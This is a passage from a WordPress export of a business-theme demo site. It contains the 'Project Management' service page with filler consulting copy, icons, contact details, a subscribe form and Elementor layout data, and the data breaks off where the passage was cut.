		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:11:{s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:5;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:7:{s:21:"typography_typography";i:4;s:27:"typography_font_size_mobile";i:2;s:22:"typography_font_weight";i:4;s:11:"title_color";i:2;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;s:25:"typography_text_transform";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:4;s:3:"gap";i:4;s:6:"weight";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:12:"_css_classes";i:2;s:7:"_margin";i:2;}}}}s:6:"column";a:3:{s:5:"count";i:13;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:13;s:19:"_inline_size_mobile";i:4;s:19:"_inline_size_tablet";i:3;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:3:{s:13:"margin_tablet";i:3;s:6:"margin";i:2;s:13:"margin_mobile";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:6:"layout";i:5;s:3:"gap";i:6;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:6;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:4:{s:7:"padding";i:5;s:14:"padding_mobile";i:4;s:6:"margin";i:2;s:13:"margin_mobile";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:2;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:2;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:8:{s:10:"text_color";i:1;s:16:"text_color_hover";i:1;s:11:"text_indent";i:1;s:26:"icon_typography_typography";i:1;s:27:"icon_typography_font_family";i:1;s:25:"icon_typography_font_size";i:1;s:27:"icon_typography_font_weight";i:1;s:30:"icon_typography_text_transform";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_image";a:5:{s:5:"image";i:1;s:10:"image_size";i:1;s:5:"align";i:1;s:7:"link_to";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}}}s:11:"text-editor";a:3:{s:5:"count";i:3;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:1:{s:6:"editor";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:8:"_padding";i:2;s:15:"_padding_mobile";i:2;s:7:"_margin";i:1;}}}}s:9:"iiconbox2";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"icon_font";i:4;s:5:"title";i:4;s:3:"des";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:9:"icon_size";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:3:{s:9:"btn_style";i:1;s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:17:"button_text_color";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"title";i:4;s:7:"percent";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:8:"_padding";i:4;s:15:"_padding_tablet";i:3;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:10:"lbar_color";i:4;}}}}s:11:"iaccordions";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:7:"ot_accs";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Project Management</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/project-management/</link>
		<pubDate>Tue, 22 Sep 2020 02:52:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=996</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box4.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box4-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h5>How It Works &amp; How We Do It</h5>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h5>Business Planning &amp; Strategy</h5>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home3-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h6>Services</h6>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">finance planning
</a></li>
</ul>
<h6>Contacts</h6>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home3.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>996</wp:post_id>
		<wp:post_date><![CDATA[2020-09-22 02:52:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-22 02:52:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[project-management]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"6faa64b","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"0bb9c88","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"6824581","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box4.jpg","id":905},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"3400a2a","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"c4b8ef3","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a0af2ca","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"4ad2da5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"c3411e5","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"fddc28e","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"fbccab8","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2afaea5","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"a8024cf","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"d420dea","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"ab89b5a","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8c96bde","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and procedures<\/p>","text_color":"#FFFFFF","typography_font_family":"Raleway","typography_font_weight":"400","_padding":{"unit":"px","top":"28","right":"0","bottom":"25","left":"50","isLinked":false},"_border_border":"solid","_border_width":{"unit":"px","top":"0","right":"0","bottom":"0","left":"5","isLinked":false},"_border_color":"#D92300","_margin":{"unit":"px","top":"0","right":"-15","bottom":"0","left":"-15","isLinked":false},"_css_classes":"section-baner","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"dc8f05f","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"c88ecd3","elType":"widget","settings":{"editor":"<p>Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a061656","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"ab8f838"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"b9814ba","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"40","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"3838be4","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"72c6e5e","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ee945f4","elType":"widget","settings":{"title":"Business Planning & 